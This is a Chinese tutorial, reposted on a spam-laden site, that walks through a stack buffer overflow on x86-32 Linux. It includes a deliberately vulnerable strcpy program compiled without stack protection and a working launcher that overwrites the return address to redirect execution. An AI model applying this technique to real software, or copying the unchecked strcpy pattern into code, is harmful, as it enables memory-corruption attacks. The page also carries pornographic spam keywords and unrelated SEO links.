中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁(yè) > news >正文

做設(shè)計(jì)的搜素材上什么網(wǎng)站廣州優(yōu)化營(yíng)商環(huán)境條例

做設(shè)計(jì)的搜素材上什么網(wǎng)站,廣州優(yōu)化營(yíng)商環(huán)境條例,仿制網(wǎng)站侵權(quán)嗎,房產(chǎn)網(wǎng)站建設(shè)在x86-32-Linux下構(gòu)造一個(gè)棧溢出攻擊 棧緩沖區(qū)溢出攻擊:向棧上的數(shù)組寫入超過(guò)數(shù)組長(zhǎng)度的數(shù)據(jù)導(dǎo)致覆蓋到正常數(shù)據(jù){棧幀上的返回地址}。 IA-32下C函數(shù)調(diào)用約定: 調(diào)用者將參數(shù)從右向左入棧,構(gòu)造參數(shù)call 指令短跳轉(zhuǎn),會(huì)將call指令下一…

在x86-32-Linux下構(gòu)造一個(gè)棧溢出攻擊

棧緩沖區(qū)溢出攻擊:向棧上的數(shù)組寫入超過(guò)數(shù)組長(zhǎng)度的數(shù)據(jù)導(dǎo)致覆蓋到正常數(shù)據(jù){棧幀上的返回地址}。

IA-32下C函數(shù)調(diào)用約定:

  1. 調(diào)用者將參數(shù)從右向左入棧,構(gòu)造參數(shù)
  2. call 指令短跳轉(zhuǎn),會(huì)將call指令下一條指令地址(RA)入棧,供RET指令返回使用
  3. 被調(diào)用函數(shù)創(chuàng)建棧幀,push %ebp; mov %esp, %ebp;

則一個(gè)函數(shù)調(diào)用的棧幀情況:

void func(int a,int b,int c) {int tmp = 0x99;return ;
}
void main() {func(1,2,3);
}
0x0參數(shù)C
0x4參數(shù)B
0x8參數(shù)A
0xCRA地址
0x10舊%ebp
0x14tmp變量值0x99

攻擊原理: 利用strcpy(dst, src)函數(shù),對(duì)寫入的src數(shù)據(jù)長(zhǎng)度不做檢查的特性,對(duì)函數(shù)的棧數(shù)組進(jìn)行寫溢出攻擊。

假設(shè)待寫溢出的數(shù)組在test()中

// a.c
#include <stdio.h>
#include <string.h>void test(char *str) {char buffer[16]; // 待攻擊處strcpy(buffer, str);printf("%s\n", buffer);
}void hacker(void) {printf("being hacked\n");
}int main(int argc,char *argv[]) {test(argv[1]);return 0;
}

gcc a.c -o a.out 編譯后,objdump -d a.out反匯編查看棧布局。

發(fā)現(xiàn)GCC對(duì)strcpy()的調(diào)用處插入棧檢查代碼call 8048398 <__stack_chk_fail@plt>.

首先關(guān)閉gcc的棧保護(hù)機(jī)制,gcc -o a.out -fno-stack-protector,查看反匯編發(fā)現(xiàn)沒(méi)有了棧檢查代碼。

于是根據(jù)反匯編代碼來(lái)得到test()的棧幀布局情況。
1

sub $0x28, %esp指令得知gcc給test()函數(shù)生成了0x28個(gè)字節(jié)大小的??臻g,布局如下。

并且通過(guò)傳入strcpy()函數(shù)的buffer參數(shù)lea -0x18(%ebp), %eax得到buffer變量在棧上的起始地址

數(shù)組buffer的起始地址是-0x18(%ebp),于是便能夠知道數(shù)組在棧幀的中的位置

%ebp+0x8參數(shù) char *str
%ebp+0x4RA返回地址
%ebp當(dāng)前的值,也就是test的棧底,0main的%ebp
%ebp-0x4
ebp-0x8
-0xCbuf 12~15
-0x10buf 8~11
-0x14buf 4~7
-0x18buf 0~3
-0x1C
%ebp-0x20
%ebp-0x24 = %esp + 0x4strcpy的參數(shù):char *str
%ebp-0x28 = %espstrcpy的參數(shù):buf地址=-0x18(%ebp)

既然有了buffer數(shù)組的位置,那么就能得到buffer數(shù)組到RA返回地址處的長(zhǎng)度=16+3*4=28字節(jié),28字節(jié)后面開(kāi)始的 4字節(jié)便是需要構(gòu)造的"攻擊"跳轉(zhuǎn)地址

假設(shè)我們想要其跳轉(zhuǎn)到void hacker()函數(shù),寫入RA處為hacker()函數(shù)地址即可。反匯編查看hacker()函數(shù)的虛擬地址

2

有了hacker()函數(shù)地址,便能構(gòu)造寫溢出攻擊字符串的內(nèi)容了,28字節(jié)的垃圾字符+4字節(jié)hacker()函數(shù)地址+\0

代碼如下:

// test.c
#include <unistd.h>
#include <stdio.h>char tmp[33];int main() {for (int i=0; i<28; i++)tmp[i] = 'F';// 對(duì)應(yīng)hacker()地址 0x08048439tmp[28] = '\x39';tmp[29] = '\x84';tmp[30] = '\x04';tmp[31] = '\x08';tmp[32] = '\0';char *argv[3] = { "./a.out", tmp, NULL};execve(argv[0], argv, NULL);return 0;
}
// gcc a.c -fno-stack-protector -o a.out
// gcc test.c -o test -std=c99

./test運(yùn)行結(jié)果如下:棧溢出攻擊成功
3

總結(jié)

需要根據(jù)反匯編代碼來(lái)查看函數(shù)棧中的變量的布局,然后根據(jù)棧變量布局再來(lái)構(gòu)造溢出字符串。

http://www.risenshineclean.com/news/48357.html

相關(guān)文章:

  • 哈爾濱網(wǎng)站建設(shè)教程seo站長(zhǎng)助手
  • 石臺(tái)做網(wǎng)站新的營(yíng)銷模式有哪些
  • wordpress網(wǎng)址轉(zhuǎn)跳插件seo是什么專業(yè)的課程
  • ps做網(wǎng)站頁(yè)面設(shè)置為多大seo推廣優(yōu)化工具
  • 標(biāo)題優(yōu)化方法百度網(wǎng)站免費(fèi)優(yōu)化軟件下載
  • php企業(yè)網(wǎng)站源代碼網(wǎng)站優(yōu)化方式有哪些
  • 網(wǎng)站開(kāi)發(fā)論文題目seo排名系統(tǒng)源碼
  • 網(wǎng)站的ci設(shè)計(jì)怎么做優(yōu)化網(wǎng)站打開(kāi)速度
  • 網(wǎng)站開(kāi)發(fā) 外包空心cba最新排名
  • javaweb一個(gè)旅游網(wǎng)站怎么做無(wú)憂軟文網(wǎng)
  • 新聞網(wǎng)站個(gè)人可以做嗎軟文寫作范例大全
  • wordpress插件分享顯示官網(wǎng)seo關(guān)鍵詞排名系統(tǒng)
  • 南平網(wǎng)站建設(shè)公司超能搜索引擎系統(tǒng)網(wǎng)站
  • 網(wǎng)站建設(shè)教學(xué)廊坊電商網(wǎng)站入口
  • 二維碼圖片個(gè)人網(wǎng)站seo入門
  • 寶坻做網(wǎng)站上海關(guān)鍵詞優(yōu)化排名哪家好
  • wordpress無(wú)法新建頁(yè)面網(wǎng)站優(yōu)化+山東
  • 中國(guó)做爰網(wǎng)站外鏈工具軟件
  • web軟件開(kāi)發(fā)工具百度seo插件
  • 廣州建委網(wǎng)站google推廣一年的費(fèi)用
  • 網(wǎng)站建設(shè)經(jīng)典范例萬(wàn)網(wǎng)域名注冊(cè)查詢網(wǎng)
  • 格爾木有做網(wǎng)站的嗎seo網(wǎng)站推廣杭州
  • 行業(yè)軟件公司外包南京seo全網(wǎng)營(yíng)銷
  • div css3網(wǎng)站布局鄭州制作網(wǎng)站公司
  • 網(wǎng)站建設(shè)進(jìn)度表怎么做看廣告收益最高的軟件
  • 國(guó)際新聞最新消息戰(zhàn)爭(zhēng)視頻網(wǎng)站關(guān)鍵字排名優(yōu)化
  • 百度云盤做網(wǎng)站百度新聞客戶端
  • 動(dòng)態(tài)網(wǎng)站開(kāi)發(fā)報(bào)告seo推廣優(yōu)化
  • 網(wǎng)站建設(shè)app平臺(tái)關(guān)鍵詞排名優(yōu)化
  • 網(wǎng)站建設(shè)公司怎么宣傳廈門百度seo